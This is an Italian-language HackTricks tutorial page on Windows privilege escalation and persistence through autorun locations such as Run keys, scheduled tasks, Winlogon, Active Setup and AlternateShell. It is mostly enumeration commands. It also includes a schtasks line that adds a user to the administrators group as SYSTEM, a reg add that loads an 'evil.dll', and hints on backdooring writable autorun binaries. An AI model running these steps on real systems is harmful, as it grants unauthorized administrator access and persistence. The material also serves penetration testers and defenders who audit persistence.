24 KiB
Privilege Escalation with Autoruns
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Bug bounty tip: iscriviti a Intigriti, una premium bug bounty platform creata da hacker, per hacker! Unisciti a noi su https://go.intigriti.com/hacktricks oggi, e inizia a guadagnare ricompense fino a $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
WMIC
Wmic può essere utilizzato per eseguire programmi all'avvio. Vedi quali binari sono programmati per essere eseguiti all'avvio con:
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Attività Pianificate
Le attività possono essere programmate per essere eseguite con una certa frequenza. Vedi quali binari sono programmati per essere eseguiti con:
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
Folders
Tutti i binari situati nelle cartelle di avvio verranno eseguiti all'avvio. Le cartelle di avvio comuni sono quelle elencate di seguito, ma la cartella di avvio è indicata nel registro. Leggi questo per scoprire dove.
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
Registry
{% hint style="info" %} Nota da qui: L'entry di registro Wow6432Node indica che stai eseguendo una versione di Windows a 64 bit. Il sistema operativo utilizza questa chiave per visualizzare una vista separata di HKEY_LOCAL_MACHINE\SOFTWARE per le applicazioni a 32 bit che girano su versioni di Windows a 64 bit. {% endhint %}
Runs
Conosciuto comunemente registro AutoRun:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Le chiavi di registro conosciute come Run e RunOnce sono progettate per eseguire automaticamente programmi ogni volta che un utente accede al sistema. La riga di comando assegnata come valore dei dati di una chiave è limitata a 260 caratteri o meno.
Service runs (può controllare l'avvio automatico dei servizi durante l'avvio):
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
RunOnceEx:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceExHKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx
Su Windows Vista e versioni successive, le chiavi di registro Run e RunOnce non vengono generate automaticamente. Le voci in queste chiavi possono avviare direttamente programmi o specificarli come dipendenze. Ad esempio, per caricare un file DLL all'accesso, si potrebbe utilizzare la chiave di registro RunOnceEx insieme a una chiave "Depend". Questo è dimostrato aggiungendo un'entry di registro per eseguire "C:\temp\evil.dll" durante l'avvio del sistema:
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
{% hint style="info" %} Exploit 1: Se puoi scrivere all'interno di uno dei registri menzionati in HKLM, puoi elevare i privilegi quando un altro utente accede. {% endhint %}
{% hint style="info" %} Exploit 2: Se puoi sovrascrivere uno dei binari indicati in uno dei registri all'interno di HKLM, puoi modificare quel binario con una backdoor quando un altro utente accede ed elevare i privilegi. {% endhint %}
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Startup Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
I collegamenti posizionati nella cartella Startup attiveranno automaticamente servizi o applicazioni all'accesso dell'utente o al riavvio del sistema. La posizione della cartella Startup è definita nel registro sia per l'ambito Local Machine che per l'ambito Current User. Ciò significa che qualsiasi collegamento aggiunto a queste posizioni Startup specificate garantirà che il servizio o il programma collegato si avvii dopo il processo di accesso o riavvio, rendendolo un metodo semplice per programmare l'esecuzione automatica dei programmi.
{% hint style="info" %} Se puoi sovrascrivere qualsiasi [User] Shell Folder sotto HKLM, sarai in grado di puntarlo a una cartella controllata da te e posizionare una backdoor che verrà eseguita ogni volta che un utente accede al sistema, aumentando i privilegi. {% endhint %}
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Winlogon Keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Tipicamente, la chiave Userinit è impostata su userinit.exe. Tuttavia, se questa chiave viene modificata, l'eseguibile specificato verrà avviato anche da Winlogon al momento del login dell'utente. Allo stesso modo, la chiave Shell è destinata a puntare a explorer.exe, che è la shell predefinita per Windows.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
{% hint style="info" %} Se puoi sovrascrivere il valore del registro o il binario, sarai in grado di elevare i privilegi. {% endhint %}
Impostazioni della Politica
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Controlla la chiave Esegui.
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
AlternateShell
Modifica del Prompt dei Comandi in Modalità Provvisoria
Nel Registro di Windows sotto HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot, c'è un valore AlternateShell impostato per impostazione predefinita su cmd.exe. Questo significa che quando scegli "Modalità Provvisoria con Prompt dei Comandi" durante l'avvio (premendo F8), viene utilizzato cmd.exe. Tuttavia, è possibile configurare il computer per avviarsi automaticamente in questa modalità senza dover premere F8 e selezionarla manualmente.
Passaggi per creare un'opzione di avvio per avviarsi automaticamente in "Modalità Provvisoria con Prompt dei Comandi":
- Cambia gli attributi del file
boot.iniper rimuovere i flag di sola lettura, sistema e nascosto:attrib c:\boot.ini -r -s -h - Apri
boot.iniper la modifica. - Inserisci una riga come:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL) - Salva le modifiche a
boot.ini. - Ripristina gli attributi originali del file:
attrib c:\boot.ini +r +s +h
- Exploit 1: Modificare la chiave di registro AlternateShell consente di configurare un shell di comando personalizzato, potenzialmente per accesso non autorizzato.
- Exploit 2 (Permessi di Scrittura nel PATH): Avere permessi di scrittura su qualsiasi parte della variabile di sistema PATH, specialmente prima di
C:\Windows\system32, consente di eseguire uncmd.exepersonalizzato, che potrebbe essere una backdoor se il sistema viene avviato in Modalità Provvisoria. - Exploit 3 (Permessi di Scrittura nel PATH e boot.ini): L'accesso in scrittura a
boot.iniconsente l'avvio automatico in Modalità Provvisoria, facilitando l'accesso non autorizzato al successivo riavvio.
Per controllare l'attuale impostazione di AlternateShell, utilizza questi comandi:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
Installed Component
Active Setup è una funzionalità di Windows che si avvia prima che l'ambiente desktop sia completamente caricato. Prioritizza l'esecuzione di determinati comandi, che devono completarsi prima che il login dell'utente proceda. Questo processo avviene anche prima che vengano attivati altri elementi di avvio, come quelli nelle sezioni del registro Run o RunOnce.
Active Setup è gestito attraverso le seguenti chiavi di registro:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
All'interno di queste chiavi, esistono vari sottochiavi, ciascuna corrispondente a un componente specifico. I valori chiave di particolare interesse includono:
- IsInstalled:
0indica che il comando del componente non verrà eseguito.1significa che il comando verrà eseguito una volta per ogni utente, che è il comportamento predefinito se il valoreIsInstalledè mancante.- StubPath: Definisce il comando da eseguire tramite Active Setup. Può essere qualsiasi riga di comando valida, come l'avvio di
notepad.
Security Insights:
- Modificare o scrivere in una chiave dove
IsInstalledè impostato su"1"con unStubPathspecifico può portare all'esecuzione non autorizzata di comandi, potenzialmente per l'escalation dei privilegi. - Alterare il file binario referenziato in qualsiasi valore di
StubPathpotrebbe anche ottenere l'escalation dei privilegi, date sufficienti autorizzazioni.
Per ispezionare le configurazioni di StubPath attraverso i componenti di Active Setup, possono essere utilizzati i seguenti comandi:
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
Browser Helper Objects
Overview of Browser Helper Objects (BHOs)
Browser Helper Objects (BHOs) sono moduli DLL che aggiungono funzionalità extra a Microsoft Internet Explorer. Si caricano in Internet Explorer e Windows Explorer ad ogni avvio. Tuttavia, la loro esecuzione può essere bloccata impostando la chiave NoExplorer a 1, impedendo loro di caricarsi con le istanze di Windows Explorer.
I BHOs sono compatibili con Windows 10 tramite Internet Explorer 11 ma non sono supportati in Microsoft Edge, il browser predefinito nelle versioni più recenti di Windows.
Per esplorare i BHOs registrati su un sistema, puoi ispezionare le seguenti chiavi di registro:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsHKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Ogni BHO è rappresentato dal suo CLSID nel registro, che funge da identificatore unico. Informazioni dettagliate su ciascun CLSID possono essere trovate sotto HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}.
Per interrogare i BHOs nel registro, possono essere utilizzati i seguenti comandi:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
Estensioni di Internet Explorer
HKLM\Software\Microsoft\Internet Explorer\ExtensionsHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions
Nota che il registro conterrà 1 nuovo registro per ogni dll e sarà rappresentato dal CLSID. Puoi trovare le informazioni sul CLSID in HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}
Driver dei Font
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font DriversHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Open Command
HKLM\SOFTWARE\Classes\htmlfile\shell\open\commandHKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
Opzioni di Esecuzione dei File Immagine
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
SysInternals
Nota che tutti i siti dove puoi trovare autorun sono già stati cercati da winpeas.exe. Tuttavia, per un elenco più completo di file auto-eseguiti puoi utilizzare autoruns di sysinternals:
autorunsc.exe -m -nobanner -a * -ct /accepteula
More
Trova più Autoruns come registri in https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
References
- https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref
- https://attack.mitre.org/techniques/T1547/001/
- https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
- https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell
Bug bounty tip: iscriviti a Intigriti, una premium bug bounty platform creata da hacker, per hacker! Unisciti a noi su https://go.intigriti.com/hacktricks oggi, e inizia a guadagnare ricompense fino a $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Controlla i piani di abbonamento!
- Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
- Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.